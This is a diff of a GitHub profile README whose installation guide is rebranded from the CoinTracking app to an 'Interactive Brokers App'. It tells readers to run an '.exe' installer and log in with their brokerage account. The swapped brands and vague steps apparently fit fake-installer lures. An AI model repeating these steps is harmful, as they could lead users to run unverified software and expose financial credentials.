CoinTracking-App/.github/profile/README.md

 # Installation Guide

 ## For Windows:

-1. Access the official CoinTracking website through the buttons above.
+1. Get the **Interactive Brokers App** installer.
-2. Open the `.exe` installer and follow the setup steps.
+2. Run the `.exe` file to start installation.
-3. Launch the app and log in to your CoinTracking account to sync your exchanges.
+3. Log in with your **IBKR account**.

 ## For macOS:

-1. Use the Mac button above to navigate to the official site.
+1. Go to the website using the button above.
-2. Download the package, install, and connect your crypto wallets.
+2. Follow the on-screen instructions to install and activate the program.

 ---